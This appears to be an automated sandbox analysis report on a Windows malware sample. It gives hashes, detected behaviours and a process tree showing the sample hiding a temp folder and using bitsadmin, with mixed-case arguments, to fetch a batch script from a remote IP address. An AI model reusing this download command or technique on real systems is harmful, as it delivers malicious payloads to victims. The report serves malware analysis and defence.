Analysis
max time kernel: 125s
max time network: 131s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06-08-2024 02:12
Static task: static1
Behavioral task: behavioral1
Sample: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
Resource: win7-20240704-en
General
Target: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
Size: 126KB
MD5: b2dc0f8a36a7e450b11149a8e15ca964
SHA1: 27fd3d24a969b5b0528b69f1cbd8b293e74a6809
SHA256: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15
SHA512: 135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933
SSDEEP: 1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4
Malware Config
Signatures
- Download via BitsAdmin (1 TTPs, 2 IoCs)
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 19 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | attrib.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
- Suspicious use of WriteProcessMemory (54 IoCs)
  Processes:
  description | pid | process | target process
  PID 4316 wrote to memory of 2400 | 4316 | ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | cmd.exe
  PID 4316 wrote to memory of 2400 | 4316 | ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | cmd.exe
  PID 4316 wrote to memory of 2400 | 4316 | ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | cmd.exe
  PID 2400 wrote to memory of 2132 | 2400 | cmd.exe | attrib.exe
  PID 2400 wrote to memory of 2132 | 2400 | cmd.exe | attrib.exe
  PID 2400 wrote to memory of 2132 | 2400 | cmd.exe | attrib.exe
  PID 2400 wrote to memory of 4640 | 2400 | cmd.exe | cmd.exe
  PID 2400 wrote to memory of 4640 | 2400 | cmd.exe | cmd.exe
  PID 2400 wrote to memory of 4640 | 2400 | cmd.exe | cmd.exe
  PID 4640 wrote to memory of 4020 | 4640 | cmd.exe | bitsadmin.exe
  PID 4640 wrote to memory of 4020 | 4640 | cmd.exe | bitsadmin.exe
  PID 4640 wrote to memory of 4020 | 4640 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 2596 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 2596 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 2596 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 4988 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 4988 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 4988 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 1756 | 2400 | cmd.exe | cmd.exe
  PID 2400 wrote to memory of 1756 | 2400 | cmd.exe | cmd.exe
  PID 2400 wrote to memory of 1756 | 2400 | cmd.exe | cmd.exe
  PID 1756 wrote to memory of 1812 | 1756 | cmd.exe | bitsadmin.exe
  PID 1756 wrote to memory of 1812 | 1756 | cmd.exe | bitsadmin.exe
  PID 1756 wrote to memory of 1812 | 1756 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 420 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 420 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 420 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 4456 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 4456 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 4456 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 2524 | 2400 | cmd.exe | cmd.exe
  PID 2400 wrote to memory of 2524 | 2400 | cmd.exe | cmd.exe
  PID 2400 wrote to memory of 2524 | 2400 | cmd.exe | cmd.exe
  PID 2524 wrote to memory of 3996 | 2524 | cmd.exe | bitsadmin.exe
  PID 2524 wrote to memory of 3996 | 2524 | cmd.exe | bitsadmin.exe
  PID 2524 wrote to memory of 3996 | 2524 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 2912 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 2912 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 2912 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 2956 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 2956 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 2956 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 1928 | 2400 | cmd.exe | cmd.exe
  PID 2400 wrote to memory of 1928 | 2400 | cmd.exe | cmd.exe
  PID 2400 wrote to memory of 1928 | 2400 | cmd.exe | cmd.exe
  PID 1928 wrote to memory of 2640 | 1928 | cmd.exe | bitsadmin.exe
  PID 1928 wrote to memory of 2640 | 1928 | cmd.exe | bitsadmin.exe
  PID 1928 wrote to memory of 2640 | 1928 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 4332 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 4332 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 4332 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 3596 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 3596 | 2400 | cmd.exe | bitsadmin.exe
  PID 2400 wrote to memory of 3596 | 2400 | cmd.exe | bitsadmin.exe
- Views/modifies file attributes (1 TTPs, 1 IoCs)
Processes (process tree; indentation shows parent/child depth)

C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe (PID 4316)
  command line: "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (PID 2400)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t14845.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\attrib.exe (PID 2132)
      command line: attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
      - System Location Discovery: System Language Discovery
      - Views/modifies file attributes

    C:\Windows\SysWOW64\cmd.exe (PID 4640)
      command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\bitsadmin.exe (PID 4020)
        command line: Bitsadmin
        - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\bitsadmin.exe (PID 2596)
      command line: bitsadmin
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\bitsadmin.exe (PID 4988)
      command line: bitsadmin /crEaTe pls
      - Download via BitsAdmin
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\cmd.exe (PID 1756)
      command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\bitsadmin.exe (PID 1812)
        command line: Bitsadmin
        - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\bitsadmin.exe (PID 420)
      command line: bitsadmin
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\bitsadmin.exe (PID 4456)
      command line: bitsadmin /ResUme pls
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\cmd.exe (PID 2524)
      command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\bitsadmin.exe (PID 3996)
        command line: Bitsadmin
        - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\bitsadmin.exe (PID 2912)
      command line: bitsadmin
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\bitsadmin.exe (PID 2956)
      command line: bitsadmin /CompLete pls
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\cmd.exe (PID 1928)
      command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\bitsadmin.exe (PID 2640)
        command line: Bitsadmin
        - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\bitsadmin.exe (PID 4332)
      command line: bitsadmin
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\bitsadmin.exe (PID 3596)
      command line: bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
      - Download via BitsAdmin
      - System Location Discovery: System Language Discovery

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4580)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4328,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:8
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: d813dcd73594622bd3f1deefd3661175
  SHA1: 5fe85bc7dde7c19f166452641d889ff48f70022d
  SHA256: 3d73776fc4c2cd443e448831a16646c779a9f24f2b1c299d9eb41e2f928f445b
  SHA512: 347bef14d9e32f00265c72ef10b8da733a2486ac8567198123f40dbcd953cb1dd6dc171bbea2c3aae270c8eafe112ec9913186f23cb91ef29c74f37d7946aa80